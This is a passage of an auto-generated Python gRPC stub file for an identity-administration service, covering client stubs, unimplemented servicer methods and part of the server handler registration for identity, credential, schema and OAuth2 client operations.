request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentityRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentityResponse.FromString,
)
self.GetIdentitiesByAttribute = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/GetIdentitiesByAttribute',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentitiesByAttributeRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentitiesByAttributeResponse.FromString,
)
self.GetIdentities = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/GetIdentities',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentitiesRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentitiesResponse.FromString,
)
self.UpdateIdentity = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/UpdateIdentity',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateIdentityRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateIdentityResponse.FromString,
)
self.DeleteIdentity = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/DeleteIdentity',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteIdentityRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteIdentityResponse.FromString,
)
self.GetAddresses = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/GetAddresses',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetAddressesRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetAddressesResponse.FromString,
)
self.GetAddress = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/GetAddress',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetAddressRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetAddressResponse.FromString,
)
self.UpdateAddress = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/UpdateAddress',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateAddressRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateAddressResponse.FromString,
)
self.GetTraits = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/GetTraits',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetTraitsRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetTraitsResponse.FromString,
)
self.UpdateTraits = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/UpdateTraits',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateTraitsRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateTraitsResponse.FromString,
)
self.GetCredentials = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/GetCredentials',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetCredentialsRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetCredentialsResponse.FromString,
)
self.UpdateCredential = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/UpdateCredential',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateCredentialRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateCredentialResponse.FromString,
)
self.GetIdentityLoginAttempts = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/GetIdentityLoginAttempts',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentityLoginAttemptsRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentityLoginAttemptsResponse.FromString,
)
self.CreateConnection = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/CreateConnection',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateConnectionRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateConnectionResponse.FromString,
)
self.GetConnections = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/GetConnections',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetConnectionsRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetConnectionsResponse.FromString,
)
self.UpdateConnection = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/UpdateConnection',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateConnectionRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateConnectionResponse.FromString,
)
self.DeleteConnection = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/DeleteConnection',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteConnectionRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteConnectionResponse.FromString,
)
self.CreateIdSchema = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/CreateIdSchema',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateIdSchemaRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateIdSchemaResponse.FromString,
)
self.GetIdSchemas = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/GetIdSchemas',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdSchemasRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdSchemasResponse.FromString,
)
self.GetIdSchema = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/GetIdSchema',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdSchemaRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdSchemaResponse.FromString,
)
self.GetDefaultIdSchema = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/GetDefaultIdSchema',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetDefaultIdSchemaRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetDefaultIdSchemaResponse.FromString,
)
self.UpdateIdSchema = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/UpdateIdSchema',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateIdSchemaRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateIdSchemaResponse.FromString,
)
self.MarkDefaultIdSchema = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/MarkDefaultIdSchema',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.MarkDefaultIdSchemaRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.MarkDefaultIdSchemaResponse.FromString,
)
self.DeleteIdSchema = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/DeleteIdSchema',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteIdSchemaRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteIdSchemaResponse.FromString,
)
self.CreateOAuth2Client = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/CreateOAuth2Client',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateOAuth2ClientRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateOAuth2ClientResponse.FromString,
)
self.GetOAuth2Clients = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/GetOAuth2Clients',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetOAuth2ClientsRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetOAuth2ClientsResponse.FromString,
)
self.UpdateOAuth2Client = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/UpdateOAuth2Client',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateOAuth2ClientRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateOAuth2ClientResponse.FromString,
)
self.DeleteOAuth2Client = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/DeleteOAuth2Client',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteOAuth2ClientRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteOAuth2ClientResponse.FromString,
)
self.GetEmailsSetup = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/GetEmailsSetup',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetEmailsSetupRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetEmailsSetupResponse.FromString,
)
self.UpdateEmailsSetup = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/UpdateEmailsSetup',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateEmailsSetupRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateEmailsSetupResponse.FromString,
)
self.GetUserBaseStatistics = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/GetUserBaseStatistics',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetUserBaseStatisticsRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetUserBaseStatisticsResponse.FromString,
)
class AdminServicer(object):
"""Missing associated documentation comment in .proto file."""
def CreateIdentity(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetIdentity(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetIdentitiesByAttribute(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetIdentities(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateIdentity(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteIdentity(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetAddresses(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetAddress(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateAddress(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetTraits(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateTraits(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetCredentials(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateCredential(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetIdentityLoginAttempts(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def CreateConnection(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetConnections(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateConnection(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteConnection(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def CreateIdSchema(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetIdSchemas(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetIdSchema(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetDefaultIdSchema(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateIdSchema(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def MarkDefaultIdSchema(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteIdSchema(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def CreateOAuth2Client(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetOAuth2Clients(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateOAuth2Client(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteOAuth2Client(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetEmailsSetup(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateEmailsSetup(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetUserBaseStatistics(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_AdminServicer_to_server(servicer, server):
rpc_method_handlers = {
'CreateIdentity': grpc.unary_unary_rpc_method_handler(
servicer.CreateIdentity,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateIdentityRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateIdentityResponse.SerializeToString,
),
'GetIdentity': grpc.unary_unary_rpc_method_handler(
servicer.GetIdentity,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentityRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentityResponse.SerializeToString,
),
'GetIdentitiesByAttribute': grpc.unary_unary_rpc_method_handler(
servicer.GetIdentitiesByAttribute,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentitiesByAttributeRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentitiesByAttributeResponse.SerializeToString,
),
'GetIdentities': grpc.unary_unary_rpc_method_handler(
servicer.GetIdentities,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentitiesRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentitiesResponse.SerializeToString,
),
'UpdateIdentity': grpc.unary_unary_rpc_method_handler(
servicer.UpdateIdentity,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateIdentityRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateIdentityResponse.SerializeToString,
),
'DeleteIdentity': grpc.unary_unary_rpc_method_handler(
servicer.DeleteIdentity,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteIdentityRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteIdentityResponse.SerializeToString,
),
'GetAddresses': grpc.unary_unary_rpc_method_handler(
servicer.GetAddresses,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetAddressesRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetAddressesResponse.SerializeToString,
),
'GetAddress': grpc.unary_unary_rpc_method_handler(
servicer.GetAddress,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetAddressRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetAddressResponse.SerializeToString,
),
'UpdateAddress': grpc.unary_unary_rpc_method_handler(
servicer.UpdateAddress,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateAddressRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateAddressResponse.SerializeToString,
),
'GetTraits': grpc.unary_unary_rpc_method_handler(
servicer.GetTraits,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetTraitsRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetTraitsResponse.SerializeToString,
),
'UpdateTraits': grpc.unary_unary_rpc_method_handler(
servicer.UpdateTraits,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateTraitsRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateTraitsResponse.SerializeToString,
),
'GetCredentials': grpc.unary_unary_rpc_method_handler(
servicer.GetCredentials,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetCredentialsRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetCredentialsResponse.SerializeToString,
),
'UpdateCredential': grpc.unary_unary_rpc_method_handler(
servicer.UpdateCredential,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateCredentialRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateCredentialResponse.SerializeToString,
),
'GetIdentityLoginAttempts': grpc.unary_unary_rpc_method_handler(
servicer.GetIdentityLoginAttempts,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentityLoginAttemptsRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentityLoginAttemptsResponse.SerializeToString,
),
'CreateConnection': grpc.unary_unary_rpc_method_handler(
servicer.CreateConnection,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateConnectionRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateConnectionResponse.SerializeToString,
),
'GetConnections': grpc.unary_unary_rpc_method_handler(
servicer.GetConnections,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetConnectionsRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetConnectionsResponse.SerializeToString,
),
'UpdateConnection': grpc.unary_unary_rpc_method_handler(
servicer.UpdateConnection,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateConnectionRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateConnectionResponse.SerializeToString,
),
'DeleteConnection': grpc.unary_unary_rpc_method_handler(
servicer.DeleteConnection,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteConnectionRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteConnectionResponse.SerializeToString,
),
'CreateIdSchema': grpc.unary_unary_rpc_method_handler(
servicer.CreateIdSchema,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateIdSchemaRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateIdSchemaResponse.SerializeToString,
),
'GetIdSchemas': grpc.unary_unary_rpc_method_handler(
servicer.GetIdSchemas,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdSchemasRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdSchemasResponse.SerializeToString,
),
'GetIdSchema': grpc.unary_unary_rpc_method_handler(
servicer.GetIdSchema,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdSchemaRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdSchemaResponse.SerializeToString,
),
'GetDefaultIdSchema': grpc.unary_unary_rpc_method_handler(
servicer.GetDefaultIdSchema,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetDefaultIdSchemaRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetDefaultIdSchemaResponse.SerializeToString,
),
'UpdateIdSchema': grpc.unary_unary_rpc_method_handler(
servicer.UpdateIdSchema,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateIdSchemaRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateIdSchemaResponse.SerializeToString,
),
'MarkDefaultIdSchema': grpc.unary_unary_rpc_method_handler(
servicer.MarkDefaultIdSchema,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.MarkDefaultIdSchemaRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.MarkDefaultIdSchemaResponse.SerializeToString,
),
'DeleteIdSchema': grpc.unary_unary_rpc_method_handler(
servicer.DeleteIdSchema,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteIdSchemaRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteIdSchemaResponse.SerializeToString,
),
'CreateOAuth2Client': grpc.unary_unary_rpc_method_handler(
servicer.CreateOAuth2Client,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateOAuth2ClientRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateOAuth2ClientResponse.SerializeToString,
),
'GetOAuth2Clients': grpc.unary_unary_rpc_method_handler(
servicer.GetOAuth2Clients,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetOAuth2ClientsRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetOAuth2ClientsResponse.SerializeToString,
),
'UpdateOAuth2Client': grpc.unary_unary_rpc_method_handler(
servicer.UpdateOAuth2Client,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateOAuth2ClientRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateOAuth2ClientResponse.SerializeToString,
),
'DeleteOAuth2Client': grpc.unary_unary_rpc_method_handler(
servicer.DeleteOAuth2Client,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteOAuth2ClientRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteOAuth2ClientResponse.SerializeToString,
),
'GetEmailsSetup': grpc.unary_unary_rpc_method_handler(
servicer.GetEmailsSetup,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetEmailsSetupRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetEmailsSetupResponse.SerializeToString,
),
